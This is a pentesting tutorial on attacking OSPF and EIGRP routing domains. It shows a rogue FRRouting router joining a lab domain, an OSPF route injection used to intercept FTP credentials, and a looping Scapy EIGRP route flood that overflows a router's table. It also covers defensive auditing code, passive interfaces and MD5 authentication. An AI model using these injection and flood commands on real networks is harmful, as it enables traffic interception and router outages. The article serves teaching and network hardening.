Routing nightmare. How to pentest OSPF and EIGRP dynamic routing protocols

The magic and charm of dynamic routing protocols can be deceptive: admins trust them implicitly and often forget to properly configure the security mechanisms built into these protocols. In this article, I will explain what nightmares can occur if the network admin doesn’t take good care of the security of OSPF and EIGRP routing domains.

warning

This article is intended for security specialists operating under a contract; all information provided in it is for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication. Distribution of malware, disruption of systems, and violation of secrecy of correspondence are prosecuted by law.

All major corporate networks use dynamic routing. Routers on the network exchange routing information with each other automatically so that the network admin doesn’t have to set up all their routes manually. In most cases, the admin doesn’t configure the protective mechanisms at all. And this opens the way for exploitation.

info

Both OSPF and EIGRP belong to the class of interior gateway protocols (IGP). Such protocols are used to exchange routing information within a single Autonomous System (AS). For convenience, you can think of an AS as the network of one organization.

Problems, impact, and weapon

OSPF

OSPF (Open Shortest Path First) belongs to a type of protocols based on link state tracking. Attacking OSPF is a bit more difficult job in comparison with its relative EIGRP. Two things can complicate an attack:

  • multiple OSPF areas (zones). Engineers can design an OSPF routing domain with multiple areas to reduce the load on the routers’ computing resources. This must be taken into account when you penetrate an OSPF routing domain, for instance when you plan a route injection, because routes can be propagated between these areas; and 
  • lack of response to queries. To join a routing domain, the attacker must ensure that the fake router generates Hello messages, receives them from its neighbors, and goes through the establishment of neighborship with them. Otherwise, the fake router will be declared ‘dead’ and excluded from the routing domain, which makes any further steps impossible.
Establishing OSPF neighborship

The best way to attack an OSPF domain is to gain control over a legitimate router on the network. Alternatively, you can create an ‘evil’ virtual router on your side and connect it to the domain. To do this, however, you have to parse the OSPF multicast packets and examine the following parameters in them:

  • OSPF Hello Interval;
  • OSPF Dead Interval; and 
  • presence of authentication.

Even if OSPF is protected by authentication, and the passwords are stored as MD5 hashes, there is still a chance for the attacker to guess them.
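To show what examining those Hello parameters looks like from the auditing side, here is an added example of my own (not code from the article or from FRRouting): it constructs a sample OSPFv2 Hello, parses the header fields listed above and rates the exposure; the risk wording and the sample router IDs are my own.

```python
import struct
from ipaddress import IPv4Address

# OSPFv2 header: version, type, length, router id, area id, checksum, auth type, auth data (24 bytes)
OSPF_HEADER = struct.Struct("!BBH4s4sHH8s")
# Hello body: network mask, hello interval, options, priority, dead interval, DR, BDR (20 bytes)
HELLO_BODY = struct.Struct("!4sHBBI4s4s")
AUTH_NAMES = {0: "null", 1: "simple password", 2: "cryptographic (MD5)"}
RISK = {0: "HIGH: any host on the segment can form an adjacency",
        1: "MEDIUM: password travels in clear text in every packet",
        2: "LOW: keyed digest, but a weak key can still be brute-forced offline"}

def build_hello(router_id, area, auth_type, auth_data=b"\x00" * 8, hello=10, dead=40):
    """Constructed sample Hello (not a capture); it only feeds the auditor below."""
    body = HELLO_BODY.pack(IPv4Address("255.255.255.0").packed, hello, 0x02, 1, dead,
                           IPv4Address(router_id).packed, IPv4Address("0.0.0.0").packed)
    hdr = OSPF_HEADER.pack(2, 1, OSPF_HEADER.size + len(body), IPv4Address(router_id).packed,
                           IPv4Address(area).packed, 0, auth_type, auth_data)
    return hdr + body

def audit_hello(pkt):
    """Extract the parameters a rogue neighbour would need and rate the exposure."""
    version, ptype, _length, rid, area, _csum, auth_type, auth_data = OSPF_HEADER.unpack_from(pkt)
    if version != 2 or ptype != 1:
        raise ValueError("not an OSPFv2 Hello")
    _mask, hello, _opts, _prio, dead, _dr, _bdr = HELLO_BODY.unpack_from(pkt, OSPF_HEADER.size)
    finding = {"router_id": str(IPv4Address(rid)), "area": str(IPv4Address(area)),
               "hello_interval": hello, "dead_interval": dead,
               "auth": AUTH_NAMES.get(auth_type, "unknown"),
               "risk": RISK.get(auth_type, "UNKNOWN auth type")}
    if auth_type == 2:
        # Cryptographic auth data field: 2 reserved bytes, key id, auth data length, sequence number.
        _, key_id, _auth_len, seq = struct.unpack("!HBBI", auth_data)
        finding["key_id"], finding["auth_seq"] = key_id, seq
    return finding
```

Run the auditor over each Hello seen on a segment; any result rated HIGH is an interface that should be passive or authenticated.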

Password to an OSPF domain has been cracked using the Loki tool

EIGRP

EIGRP (Enhanced Interior Gateway Routing Protocol) belongs to the class of distance-vector protocols. It was developed by Cisco Systems as a replacement for the IGRP protocol. EIGRP routers exchange routing information using the Diffuse Update Algorithm (DUAL) to plot routes within the same AS. EIGRP stores all available backup routes to destination networks in the routing table, which makes it possible to quickly switch to a backup route if necessary.

Establishing EIGRP neighborship

info

Did you know that EIGRP is no longer a Cisco proprietary protocol and it’s now open to other network equipment vendors? EIGRP became an open standard in 2013, and the respective documentation RFC 7868 was published in 2016.

To connect to an EIGRP routing domain, the attacker must know the autonomous system number. It can be extracted, for instance, from a traffic dump using Wireshark. Unlike an OSPF domain that can be divided into multiple routing zones, an EIGRP autonomous system is flat: if you make a route injection, your route will likely spread throughout the entire domain.

Impact

Attacks on dynamic routing can be divided into three types:

  1. Network enumeration. If an attacker connects to the routing domain, they can perform network reconnaissance and discover some subnets. This is a rather useful trick since classical scans (e.g. with Nmap) take a long time. In addition, they can trigger IDS/IPS security systems. After connecting to a routing domain, you can collect information about subnets advertised by neighboring routers. Note that this method doesn’t guarantee the detection of all subnets in the organization. But it can bring you an easier win when you conduct a pentesting study.
  2. MITM (man in the middle). In essence, you inject a route to intercept traffic from the target host or network. After connecting to the routing domain, you can make an advertisement in the domain that literally reads as follows: “Dear all, the host whose IP address is 192.168.1.43/24 is now accessible via me, 192.168.1.150.” The routers in the domain will accept the new information and add the route you have advertised to their routing tables. Important: routers use metrics to make routing decisions. If your route is worse than the others in terms of path cost, it won’t be included in the routing table. Why? Because the routing table stores only the best paths to destination networks.
  3. DoS (Denial of Service). Routing table overflow: all router’s CPU and RAM resources are depleted. If the routing table is overflowed, it becomes impossible to add a new legitimate route to it. The router won’t be able to add to its table the route to a new network that has just appeared.

Lethal weapon: FRRouting

FRRouting is an open source solution that creates a virtual router in Unix/Linux. The virtual router supports such protocols as BGP, OSPF, EIGRP, RIP, etc.

Using FRRouting, you can deploy a ‘rogue’ router on your side, start routing, and connect to the target routing domain. Why is this required? Because, if you perform a route injection without joining the domain and establishing a neighborship, the routes you advertise won’t be included in the neighbors’ routing tables. They will simply be dropped.

www

I strongly recommend reviewing the FRRouting documentation; it addresses all important aspects, including installation and configuration.

Configuring FRRouting

First, you have to enable daemons in the daemons configuration file. You will need the ospfd and eigrpd daemons. It’s also necessary to enable the staticd daemon to ensure that custom static routes are redistributed correctly.

nano /etc/frr/daemons
ospfd=yes
eigrpd=yes
staticd=yes

Then you set a password to connect to the router control panel via VTY lines:

nano /etc/frr/frr.conf
password letm3in

Finally, you enable traffic forwarding. By default, it’s disabled in Linux distributions.

sudo sysctl -w net.ipv4.ip_forward=1

Start the frr daemon:

systemctl start frr
Status of the FRRouting daemon

Using the vtysh command, you access the control panel of the FRRouting virtual router.

Logging into the control panel

Virtual lab

The networks shown below will be used as the lab environment.

OSPF-based network
EIGRP-based network
IP addressing of the lab

In the context of an attack on OSPF, I will examine a route injection with subsequent traffic interception. With regards to EIGRP, I will explain how to deliver a destructive attack involving a routing table overflow (to avoid demonstrating the same attack twice). Thus, two attack variants will be addressed. OSPF can be attacked in the same way as EIGRP. However, keep in mind that destructive attacks are less practical against a production network. Perhaps such a scenario can be useful for the Red Team as a diversionary maneuver…

Route injection and traffic interception in an OSPF domain

To successfully perform route injection, you have to connect to the OSPF routing domain and advertise the network. Specify area 0.

c0ldheim@kali:~$ sudo vtysh
kali# conf t
kali(config)# router ospf
kali(config-router)# network 172.20.20.50/32 area 0.0.0.0
Traffic dump after connecting to the OSPF domain

Enable redistribution of static routes with the lowest metrics so that the injected route has the lowest cost.

kali(config-router)# redistribute static metric 0

Advertise a static route in the OSPF domain: “The host whose IP address is 172.20.20.20 is now accessible via me, 172.20.20.50.”

kali(config)# ip route 172.20.20.20/32 eth0
Traffic dump after the injection into the OSPF domain

Checking the routing table on router R2:

R2#show ip route
Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2
i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
ia - IS-IS inter area, * - candidate default, U - per-user static route
o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP
a - application route
+ - replicated route, % - next hop override, p - overrides from PfR
Gateway of last resort is not set
10.0.0.0/8 is variably subnetted, 2 subnets, 2 masks
C 10.1.1.0/24 is directly connected, GigabitEthernet0/0
L 10.1.1.2/32 is directly connected, GigabitEthernet0/0
172.20.0.0/16 is variably subnetted, 4 subnets, 2 masks
C 172.20.20.0/24 is directly connected, GigabitEthernet0/2
O E2 172.20.20.20/32
[110/0] via 172.20.20.50, 00:02:27, GigabitEthernet0/2
L 172.20.20.254/32 is directly connected, GigabitEthernet0/2
O 172.20.30.0/24 [110/2] via 10.1.1.3, 01:08:17, GigabitEthernet0/0
R2#

As you can see, the route injection was successful. R2 now believes that the host at 172.20.20.20 is accessible via your attacking machine.

Next, let’s try to connect from the DevOps host to the FTP server at 172.20.30.100.

Connecting to FTP

As a result, you are positioned between the host and the FTP server and have intercepted the unencrypted credentials.

Dump of unencrypted FTP traffic

Route injection and routing table overflow in an EIGRP domain

First, you connect to an autonomous EIGRP system and advertise a network.

c0ldheim@kali:~$ sudo vtysh
kali# conf t
kali(config)# router eigrp 1
kali(config-router)# network 172.20.20.50/32
Traffic dump after connecting to an EIGRP domain

This time, I am going to use the Scapy networking library to inject EIGRP routes.

c0ldheim@kali:~$ sudo scapy3
>>> from scapy.contrib.eigrp import * # Import module to work with EIGRP headers
>>> frame = Ether(dst="01:00:5e:00:00:0a") # Build Ethernet frame with the MAC address of the multicast advertisement destination
>>> ip = IP(src="172.20.20.50", dst="224.0.0.10") # Build IP packet with the IP address of the multicast EIGRP advertisement destination
>>> eigrp = EIGRP(opcode=1, asn=1, seq=0, ack=0, tlvlist=[EIGRPExtRoute(dst=RandIP(), nexthop="172.20.20.50")]) # Build EIGRP packet with the Update option
>>> crafted = frame/ip/eigrp # Assemble the three layers together
>>> sendp(crafted, loop=1, iface="eth0") # Put on a loop the transmission of the assembled malicious EIGRP packet
Traffic dump after the injection in the EIGRP domain

If you check the router control panel, you’ll see that the CPU load has increased significantly, reaching 87%.

CPU load at the time of overflow
Routing table after the overflow
R2#show ip route summary
IP routing table name is default (0x0)
IP routing table maximum-paths is 32
Route Source    Networks    Subnets     Replicates  Overhead    Memory (bytes)
connected       0           6           0           408         1080
static          1           0           0           68          180
application     0           0           0           0           0
eigrp 1         481         3088        0           328348      642420
internal        1192                                            358080
Total           1674        3094        0           328824      1001760

If the routing table is overflowed, the router cannot add new routes to its routing table.
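A simple way to catch such an overflow before the router runs out of memory is to poll show ip route summary and compare the per-source route counts against a known baseline. The following is an added example of mine (not from the article): the sample output is constructed from the listing above, and the pre-attack baseline counts are my assumption.

```python
import re

# Constructed sample, modelled on the "show ip route summary" listing above (the numbers are the article's).
SAMPLE_SUMMARY = """\
R2#show ip route summary
IP routing table name is default (0x0)
IP routing table maximum-paths is 32
Route Source    Networks    Subnets     Replicates  Overhead    Memory (bytes)
connected       0           6           0           408         1080
static          1           0           0           68          180
application     0           0           0           0           0
eigrp 1         481         3088        0           328348      642420
internal        1192                                            358080
Total           1674        3094        0           328824      1001760
"""
# Constructed pre-attack baseline for the same router: {route source: number of routes}.
BASELINE = {"connected": 6, "static": 1, "eigrp 1": 4}

# One per-source row: source (optionally with AS/process number), networks, subnets, replicates, overhead, memory.
# The "internal" and "Total" rows deliberately do not match.
ROW = re.compile(r"^([a-z]+(?: \d+)?)\s+(\d+)\s+(\d+)\s+\d+\s+\d+\s+(\d+)$")

def parse_route_summary(text):
    """Return {source: (networks + subnets, memory bytes)} for every routing-source row."""
    counts = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            counts[m.group(1)] = (int(m.group(2)) + int(m.group(3)), int(m.group(4)))
    return counts

def check_route_growth(current, baseline, max_growth=5.0):
    """Flag sources whose route count exceeds max_growth times the baseline (or appears from nothing)."""
    alerts = []
    for source, (routes, mem) in current.items():
        base = baseline.get(source, 0)
        if routes > max(base, 1) * max_growth:
            alerts.append(f"{source}: {routes} routes vs baseline {base}, {mem} bytes")
    return alerts
```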

How to prevent attacks on routing domains

Use passive interfaces. Configuring passive interfaces in the dynamic routing context prevents the router from sending advertisements via certain interfaces. By default (i.e. if you don’t configure passive interfaces), it sends advertisements to all interfaces, which puts the routing domain at great risk. A legitimate user on the network can deploy a virtual router in the same way as shown above and attack the routing domain.

info

In this article, I stick to the Cisco IOS CLI principles and commands.

A configuration example for OSPF:

R2#conf t # Enter global configuration mode
R2(config)# router ospf 1 # Enter the OSPF configuration mode as process 1
R2(config-router)# passive-interface GigabitEthernet 0/2 # Make the interface passive

An example for EIGRP:

R2#conf t # Enter global configuration mode
R2(config)# router eigrp 1 # Enter the EIGRP configuration mode in autonomous system 1
R2(config-router)# passive-interface GigabitEthernet 0/2 # Make the interface passive

Use authentication. Authentication in a routing domain ensures that only authorized, legitimate routers can join it. Authentication relies on passwords. If you want to secure the routing domain using authentication, make sure the passwords you use are strong enough. Keep in mind that they are hashed with cryptographic hash functions, and an attacker can read the hash values from a traffic dump and brute-force the password. With the password in hand, the attacker can easily connect to the routing domain.

Configuring authentication for OSPF using MD5:

R2#conf t # Enter global configuration mode
R2(config)# interface GigabitEthernet 0/1 # Enter interface configuration mode
R2(config-if)# ip ospf authentication message-digest # Enable MD5 authentication
R2(config-if)# ip ospf message-digest-key 1 md5 y0ur_f4ult # Set password with key-id 1

Configuring authentication for EIGRP using key-chain and MD5:

R2#conf t # Enter global configuration mode
R2(config)# key chain SecureRouting # Create a key chain called SecureRouting
R2(config-keychain)# key 1 # Create first key
R2(config-keychain-key)# key-string y0ur_f4ult # Set password
R2(config-keychain-key)# accept-lifetime 20:00:00 mar 1 2022 20:00:00 mar 2 2022 # Specify period of time during which the router will accept this key from a neighbor
R2(config-keychain-key)# send-lifetime 20:00:00 mar 1 2022 20:00:00 mar 2 2022 # Specify period of time during which the router will send this key to a neighbor
R2(config-keychain)# key 2 # After the expiry of the first key, the second key will be used automatically. Create second key
R2(config-keychain-key)# key-string y0ur_des1re # Set password
R2(config-keychain-key)# accept-lifetime 20:00:00 mar 2 2022 20:00:00 mar 3 2022 # Specify period of time during which the router will accept this key from a neighbor
R2(config-keychain-key)# send-lifetime 20:00:00 mar 2 2022 20:00:00 mar 3 2022 # Specify period of time during which the router will send this key to a neighbor
R2(config)# interface GigabitEthernet 0/1 # Enter interface configuration mode
R2(config-if)# ip authentication mode eigrp 1 md5 # Enable MD5 authentication for autonomous system EIGRP 1
R2(config-if)# ip authentication key-chain eigrp 1 SecureRouting # Specify key-chain to be used for authentication in autonomous system EIGRP 1
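As an added example of my own (not from the article), here is a small audit that applies the two rules above to an IOS-style running-config: each routing process must declare passive interfaces, and every interface that is not passive must carry authentication. The two configuration fragments are constructed, and the MD5 key is a placeholder.

```python
# Constructed IOS-style running-config fragments for R2 (not from a real device). Interface names use the
# normalised running-config form, e.g. GigabitEthernet0/2 rather than "GigabitEthernet 0/2".
WEAK_CONFIG = """\
interface GigabitEthernet0/0
 ip address 10.1.1.2 255.255.255.0
interface GigabitEthernet0/2
 ip address 172.20.20.254 255.255.255.0
router ospf 1
 network 0.0.0.0 255.255.255.255 area 0
"""
HARDENED_CONFIG = """\
interface GigabitEthernet0/0
 ip address 10.1.1.2 255.255.255.0
 ip ospf authentication message-digest
 ip ospf message-digest-key 1 md5 KEY_PLACEHOLDER
interface GigabitEthernet0/2
 ip address 172.20.20.254 255.255.255.0
router ospf 1
 network 0.0.0.0 255.255.255.255 area 0
 passive-interface GigabitEthernet0/2
"""

def parse_stanzas(config):
    """Group the config into {top-level line: [its indented sub-commands]}."""
    stanzas, current = {}, None
    for line in config.splitlines():
        if not line.strip() or line.startswith("!"):
            continue
        if line.startswith(" ") and current is not None:
            stanzas[current].append(line.strip())
        else:
            current = line.strip()
            stanzas[current] = []
    return stanzas

def audit_routing(config):
    """Findings: routing processes with no passive interfaces, and non-passive interfaces without authentication."""
    stanzas, findings, passive = parse_stanzas(config), [], set()
    for header, lines in stanzas.items():
        if header.startswith(("router ospf", "router eigrp")):
            p = {l.split()[1] for l in lines if l.startswith("passive-interface")}
            if not p:
                findings.append(f"{header}: no passive-interface, advertisements leave every interface")
            passive |= p  # assumes per-interface statements as in the article (no 'passive-interface default')
    for header, lines in stanzas.items():
        if header.startswith("interface ") and header.split(" ", 1)[1] not in passive:
            if not any(l.startswith(("ip ospf authentication", "ip authentication mode eigrp")) for l in lines):
                findings.append(f"{header}: forms adjacencies without authentication")
    return findings
```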

Conclusions

This article analyzes attack scenarios targeting the OSPF and EIGRP dynamic routing protocols. Based on my personal pentesting experience, in most cases network admins don’t configure the protection mechanisms built into these protocols. The most common OSPF/EIGRP configuration includes neither authentication nor passive interfaces. This puts the security of the local network at great risk.

Hopefully, the above information will be of interest both for pentesters (who can implement these attacks) and network admins (who can boost the security of their routing domains).

Good luck!

